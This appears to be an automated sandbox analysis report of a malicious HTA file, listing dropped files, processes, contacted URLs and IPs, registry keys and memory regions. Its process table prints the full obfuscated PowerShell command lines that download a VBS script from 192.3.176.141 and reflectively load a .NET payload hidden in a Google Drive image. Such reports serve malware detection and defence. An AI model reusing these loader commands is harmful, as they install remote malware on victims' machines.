Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
greatthingswithgoodnewsgivenbygodthingsgreat.hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\simplethingswithgreatthignsgivenmebestthings[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES81A3.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Oct 25 10:21:36 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4drbfsvf.eww.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eblcmdu.t2y.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5etwge5j.3ab.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duj2vkaf.h1j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwj4ygb0.h5t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jl02j2ms.nmr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmlvnje5.bjd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpjwyfin.25i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psrh2wmp.pl5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgq4zcxl.g3x.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkzphods\CSC792C8B6B522A465FA7FF7F31B8A0A9.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
|
modified
|
There are 10 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\greatthingswithgoodnewsgivenbygodthingsgreat.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex
bYPAss -NOP -w 1
-C DEVICECrEDENtiaLDEPloymenT.EXe ;
IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText
= [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex
= swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex
-gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command =
swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+')
Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly
= [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull,
@(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7,
5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));')
-rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES81A3.tmp"
"c:\Users\user\AppData\Local\Temp\mkzphods\CSC792C8B6B522A465FA7FF7F31B8A0A9.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
|
192.3.176.141
|
||
http://192.3.176.141/41/simpleth
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.microsoft.co3
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFl
|
unknown
|
||
http://schemas.dmtf.or
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
142.250.185.78
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.176.141
|
unknown
|
United States
|
||
142.250.185.78
|
drive.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
5F2B000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
47CE000
|
stack
|
page read and write
|
||
617A000
|
trusted library allocation
|
page read and write
|
||
6FC3000
|
heap
|
page read and write
|
||
29D0000
|
heap
|
page read and write
|
||
3568000
|
heap
|
page read and write
|
||
2A30000
|
trusted library allocation
|
page read and write
|
||
70DE000
|
stack
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
735C000
|
heap
|
page read and write
|
||
3488000
|
heap
|
page read and write
|
||
6C10000
|
trusted library allocation
|
page read and write
|
||
700D000
|
heap
|
page read and write
|
||
7690000
|
trusted library allocation
|
page read and write
|
||
8B3D000
|
heap
|
page read and write
|
||
67CD000
|
heap
|
page read and write
|
||
4CD7000
|
heap
|
page read and write
|
||
2A70000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
75CE000
|
stack
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
7357000
|
heap
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
3278000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
3554000
|
heap
|
page read and write
|
||
FEC000
|
stack
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
353B000
|
heap
|
page read and write
|
||
6ABA000
|
stack
|
page read and write
|
||
69CE000
|
stack
|
page read and write
|
||
5FCC000
|
heap
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
2F51000
|
heap
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
6E0E000
|
stack
|
page read and write
|
||
2CB6000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
2908000
|
heap
|
page read and write
|
||
55BF000
|
stack
|
page read and write
|
||
446E000
|
stack
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
2D93000
|
trusted library allocation
|
page execute and read and write
|
||
8C92000
|
trusted library allocation
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
3580000
|
trusted library allocation
|
page read and write
|
||
2A14000
|
heap
|
page read and write
|
||
716E000
|
stack
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
6176000
|
trusted library allocation
|
page read and write
|
||
7D4000
|
heap
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
2A12000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
474E000
|
stack
|
page read and write
|
||
5CE1000
|
trusted library allocation
|
page read and write
|
||
67C1000
|
heap
|
page read and write
|
||
4CE0000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
5C3E000
|
stack
|
page read and write
|
||
7090000
|
trusted library allocation
|
page read and write
|
||
88F0000
|
trusted library allocation
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
666F000
|
heap
|
page read and write
|
||
2AA8000
|
stack
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
2983000
|
trusted library allocation
|
page execute and read and write
|
||
63A9000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
72C0000
|
trusted library allocation
|
page read and write
|
||
6677000
|
heap
|
page read and write
|
||
5ED8000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
60E4000
|
heap
|
page read and write
|
||
80EE000
|
stack
|
page read and write
|
||
60E1000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
57DC000
|
heap
|
page read and write
|
||
6560000
|
heap
|
page read and write
|
||
681F000
|
heap
|
page read and write
|
||
34DF000
|
heap
|
page read and write
|
||
6178000
|
trusted library allocation
|
page read and write
|
||
6069000
|
heap
|
page read and write
|
||
2A80000
|
trusted library allocation
|
page read and write
|
||
2963000
|
heap
|
page read and write
|
||
6F80000
|
heap
|
page read and write
|
||
7B9C000
|
heap
|
page read and write
|
||
63A0000
|
trusted library allocation
|
page execute
|
||
684B000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
60D7000
|
heap
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
C6F000
|
stack
|
page read and write
|
||
6A7E000
|
stack
|
page read and write
|
||
5D7F000
|
stack
|
page read and write
|
||
5F2C000
|
heap
|
page read and write
|
||
7BD6000
|
heap
|
page read and write
|
||
2A17000
|
heap
|
page read and write
|
||
1150000
|
heap
|
page read and write
|
||
3D8000
|
stack
|
page read and write
|
||
57B8000
|
heap
|
page read and write
|
||
4D18000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
4FD0000
|
heap
|
page read and write
|
||
7E66000
|
heap
|
page read and write
|
||
353D000
|
heap
|
page read and write
|
||
680F000
|
heap
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
57E4000
|
heap
|
page read and write
|
||
356E000
|
heap
|
page read and write
|
||
34DF000
|
heap
|
page read and write
|
||
2ABB000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
4DEE000
|
trusted library allocation
|
page read and write
|
||
4370000
|
trusted library allocation
|
page execute and read and write
|
||
4CF4000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6A30000
|
heap
|
page read and write
|
||
67F8000
|
heap
|
page read and write
|
||
ED0000
|
heap
|
page read and write
|
||
682B000
|
heap
|
page read and write
|
||
6187000
|
trusted library allocation
|
page read and write
|
||
2CC0000
|
heap
|
page read and write
|
||
7210000
|
trusted library allocation
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page execute and read and write
|
||
75FB000
|
stack
|
page read and write
|
||
6DAE000
|
stack
|
page read and write
|
||
2A5E000
|
stack
|
page read and write
|
||
54A0000
|
heap
|
page execute and read and write
|
||
5848000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
60E9000
|
heap
|
page read and write
|
||
6671000
|
heap
|
page read and write
|
||
7E63000
|
heap
|
page read and write
|
||
2A4C000
|
heap
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
7E50000
|
heap
|
page read and write
|
||
436C000
|
stack
|
page read and write
|
||
57D0000
|
heap
|
page read and write
|
||
6E50000
|
heap
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
6069000
|
heap
|
page read and write
|
||
1FE000
|
stack
|
page read and write
|
||
5FA000
|
stack
|
page read and write
|
||
6C19000
|
trusted library allocation
|
page read and write
|
||
2970000
|
heap
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
60C9000
|
heap
|
page read and write
|
||
6520000
|
heap
|
page read and write
|
||
7E8000
|
heap
|
page read and write
|
||
6070000
|
heap
|
page read and write
|
||
72DC000
|
heap
|
page read and write
|
||
2C94000
|
heap
|
page read and write
|
||
7B30000
|
direct allocation
|
page read and write
|
||
6AE0000
|
trusted library allocation
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
6638000
|
heap
|
page read and write
|
||
617A000
|
trusted library allocation
|
page read and write
|
||
3548000
|
heap
|
page read and write
|
||
2A53000
|
heap
|
page read and write
|
||
2AC3000
|
heap
|
page read and write
|
||
7B3E000
|
direct allocation
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
7800000
|
heap
|
page read and write
|
||
7A2E000
|
stack
|
page read and write
|
||
680F000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
6A40000
|
trusted library allocation
|
page execute and read and write
|
||
4CDB000
|
heap
|
page read and write
|
||
81D0000
|
trusted library allocation
|
page read and write
|
||
72FB000
|
heap
|
page read and write
|
||
4CF3000
|
heap
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
2C3E000
|
stack
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
58B0000
|
heap
|
page read and write
|
||
7EE0000
|
trusted library allocation
|
page read and write
|
||
4CD2000
|
trusted library allocation
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
4D48000
|
trusted library allocation
|
page read and write
|
||
60E1000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
76F0000
|
trusted library allocation
|
page read and write
|
||
77BE000
|
stack
|
page read and write
|
||
57B4000
|
heap
|
page read and write
|
||
7290000
|
heap
|
page execute and read and write
|
||
2A15000
|
heap
|
page read and write
|
||
6490000
|
trusted library allocation
|
page read and write
|
||
480E000
|
stack
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
4C51000
|
heap
|
page read and write
|
||
6F2C000
|
heap
|
page read and write
|
||
5889000
|
trusted library allocation
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
7C64000
|
heap
|
page read and write
|
||
7A4000
|
heap
|
page read and write
|
||
67F4000
|
heap
|
page read and write
|
||
4420000
|
heap
|
page execute and read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
2DC2000
|
trusted library allocation
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
68BE000
|
stack
|
page read and write
|
||
35C0000
|
heap
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
4CC9000
|
trusted library allocation
|
page read and write
|
||
44AF000
|
stack
|
page read and write
|
||
6749000
|
heap
|
page read and write
|
||
5FCC000
|
heap
|
page read and write
|
||
2A62000
|
trusted library allocation
|
page read and write
|
||
34A6000
|
heap
|
page read and write
|
||
5100000
|
heap
|
page read and write
|
||
67C9000
|
heap
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
2A4E000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
7660000
|
trusted library allocation
|
page execute and read and write
|
||
7BEE000
|
heap
|
page read and write
|
||
7C10000
|
heap
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
2CBE000
|
stack
|
page read and write
|
||
6BC0000
|
heap
|
page read and write
|
||
7B3E000
|
direct allocation
|
page read and write
|
||
6A40000
|
heap
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
2A3F000
|
heap
|
page read and write
|
||
4CF2000
|
trusted library allocation
|
page read and write
|
||
7220000
|
trusted library allocation
|
page read and write
|
||
60E6000
|
heap
|
page read and write
|
||
857C000
|
stack
|
page read and write
|
||
7CE0000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
7810000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
2DC5000
|
trusted library allocation
|
page execute and read and write
|
||
ECE000
|
stack
|
page read and write
|
||
2A49000
|
trusted library allocation
|
page read and write
|
||
6962000
|
heap
|
page read and write
|
||
34D1000
|
heap
|
page read and write
|
||
6719000
|
heap
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
56AE000
|
stack
|
page read and write
|
||
4F9D000
|
stack
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
72C0000
|
trusted library allocation
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
4D27000
|
trusted library allocation
|
page read and write
|
||
